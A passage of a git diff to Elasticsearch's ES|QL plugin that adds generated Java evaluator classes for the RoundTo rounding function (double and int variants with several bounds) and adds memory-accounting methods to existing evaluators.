+ ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToDouble7Evaluator get(DriverContext context) { + return new RoundToDouble7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToDouble7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java new file mode 100644 index 0000000000000..2de9a4c7e0f0f --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java @@ -0,0 +1,182 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToDouble8Evaluator get(DriverContext context) { + return new RoundToDouble8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToDouble8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java new file mode 100644 index 0000000000000..85722c64bd186 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble9Evaluator.java @@ -0,0 +1,188 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToDouble9Evaluator get(DriverContext context) { + return new RoundToDouble9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToDouble9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java index da49b9c9a0990..7b44e045385cf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDoubleBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDoubleBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java index 8485e6576f82c..8d25ec29306d3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDoubleLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDoubleLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDoubleLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java new file mode 100644 index 0000000000000..66b3fc6ba0a85 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt10Evaluator.java @@ -0,0 +1,194 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final int p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, + int p1, int p2, int p3, int p4, int p5, int p6, int p7, int p8, int p9, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final int p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8, int p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToInt10Evaluator get(DriverContext context) { + return new RoundToInt10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToInt10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java index 37d2ecc276d06..73d42e28e21e3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java index e0fc9bd130fed..e26ce881aae3b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java index d426c15c38eee..593aadf9f9a65 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java index 8f47de82b63ae..9fc79057093fa 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToInt4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java new file mode 100644 index 0000000000000..ef78ae14a76fb --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToInt6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < 